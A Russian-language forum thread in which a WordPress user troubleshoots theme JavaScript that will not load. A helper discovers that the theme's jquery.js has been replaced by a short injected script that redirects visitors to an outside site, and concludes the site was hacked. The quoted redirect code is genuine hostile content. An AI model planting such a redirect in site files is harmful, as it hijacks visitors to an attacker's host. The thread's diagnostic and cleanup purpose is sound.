Помогите, пожалуйста. На сайте, сделаном на WordPress, не загружаются файлы JavaScript. в файле function.php PHP: <?php/*********загружаемые стили и скрипты**********/function load_style_script(){ wp_enqueue_script('bootstrap.min', get_template_directory_uri() . '/js/bootstrap.min.js'); wp_enqueue_script('jquery', get_template_directory_uri() . '/js/jquery.js'); wp_enqueue_script('common', get_template_directory_uri() . '/js/common.js'); wp_enqueue_style('style', get_template_directory_uri() . '/style.css'); }add_action('wp_enqueue_script', 'load_style_script' ); ?> в файле header.php перед закрывающим </head> PHP: <link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_url') ?>"/><script src="<?php bloginfo('template_url'); ?>/js/jquery.js" type="text/javascript"></script><script src="<?php bloginfo('template_url'); ?>/js/common.js" type="text/javascript"></script><script src="<?php bloginfo('template_url'); ?>/http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js" type="text/javascript"></script><script src="<?php bloginfo('template_url'); ?>/js/bootstrap.min.js" type="text/javascript"></script>
на локальной машине вин система стоит? проверить так же пути до файлов, когда откроется страница посмотреть хтмл вид и посмотреть какие пути в реалии сгенерировались
ок, я не так выразилась. сайт на локальном сервере, localhost. извините, может слишком много кода Код: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="" /> <meta name="keywords" content="" /> <title>Девичник</title> <meta name='robots' content='noindex,follow' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"http:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/devichnik.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.2.2"}}; !function(a,b,c){function d(a){var c=b.createElement("canvas"),d=c.getContext&&c.getContext("2d");return d&&d.fillText?(d.textBaseline="top",d.font="600 32px Arial","flag"===a?(d.fillText(String.fromCharCode(55356,56812,55356,56807),0,0),c.toDataURL().length>3e3):(d.fillText(String.fromCharCode(55357,56835),0,0),0!==d.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='open-sans-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&subset=latin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext&ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='http://devichnik.com/wp-includes/css/dashicons.min.css?ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='admin-bar-css' href='http://devichnik.com/wp-includes/css/admin-bar.min.css?ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='bbp-default-css' href='http://devichnik.com/wp-content/plugins/bbpress/templates/default/css/bbpress.css?ver=2.5.7-5693' type='text/css' media='screen' /> <script type='text/javascript' src='http://devichnik.com/wp-includes/js/jquery/jquery.js?ver=1.11.2'></script> <script type='text/javascript' src='http://devichnik.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://devichnik.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://devichnik.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.2.2" /> <style type="text/css" media="print">#wpadminbar { display:none; }</style> <style type="text/css" media="screen"> html { margin-top: 32px !important; } * html body { margin-top: 32px !important; } @media screen and ( max-width: 782px ) { html { margin-top: 46px !important; } * html body { margin-top: 46px !important; } } </style> <link rel="stylesheet" type="text/css" href="http://devichnik.com/wp-content/themes/forum-devichnik/style.css"/> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/js/jquery.js" type="text/javascript"></script> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/js/common.js" type="text/javascript"></script> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js" type="text/javascript"></script> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/js/bootstrap.min.js" type="text/javascript"></script> </head> пути, кажись, правильные ну кроме этого Код: <script src="http://devichnik.com/wp-content/themes/forum-devichnik/http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js" type="text/javascript"></script>
Вариантов не много, попробуй на прямую открыть путь до скрипта в браузере, обязательно проверь права на файлы и папки до скриптов.
Прописала на прямую путь - не помогло а от когда вставила скрипт прямо в шаблон header.php - то заработал. так что дело в том как прописано, или сам файл js неправильный --- Добавлено, 26 май 2015 --- Кстати,содержимое страниц, тоже не отображается. Может эти проблемы как то связаны?
ничего не правильно, файлов на домене девичник нет посмотрите на это... вот откуда пытается скачать ваши css, а их там попросту нет Код: <link rel='stylesheet' id='open-sans-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&subset=latin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext&ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='http://devichnik.com/wp-includes/css/dashicons.min.css?ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='admin-bar-css' href='http://devichnik.com/wp-includes/css/admin-bar.min.css?ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='bbp-default-css' href='http://devichnik.com/wp-content/plugins/bbpress/templates/default/css/bbpress.css?ver=2.5.7-5693' type='text/css' media='screen' /> <script type='text/javascript' src='http://devichnik.com/wp-includes/js/jquery/jquery.js?ver=1.11.2'></script> <script type='text/javascript' src='http://devichnik.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://devichnik.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://devichnik.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.2.2" /> <style type="text/css" media="print">#wpadminbar { display:none; }</style> <style type="text/css" media="screen"> html { margin-top: 32px !important; } * html body { margin-top: 32px !important; } @media screen and ( max-width: 782px ) { html { margin-top: 46px !important; } * html body { margin-top: 46px !important; } } </style> <link rel="stylesheet" type="text/css" href="http://devichnik.com/wp-content/themes/forum-devichnik/style.css"/> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/js/jquery.js" type="text/javascript"></script> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/js/common.js" type="text/javascript"></script> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js" type="text/javascript"></script> <script src="http://devichnik.com/wp-content/themes/forum-devichnik/js/bootstrap.min.js" type="text/javascript"></script>
Файл css прекрасно работает. Я так понимаю, что вы имеете ввиду, что по этой ссылке никакого файла нету? http://devichnik.com/wp-content/themes/forum-devichnik/js/jquery.js Там они есть.
Код: var redir_url = 'http://splitter.microxml.net/?f=ndjs&mid=6&domain=devichnik.com'; if (window != top) { top.location.href = redir_url; } else { window.location = redir_url; } 1КБ ?!?!?!? вы посмотрите что внутри там редирект стоит..
выше привел выдержку из этого файла, а на самом деле в этом файле не три строчки должны быть а что есть - редирект на левый сайт
вернуть все файлы которые должны были быть изначально похоже сайт был взломан и проведена такая топорная работа по передаче пользователей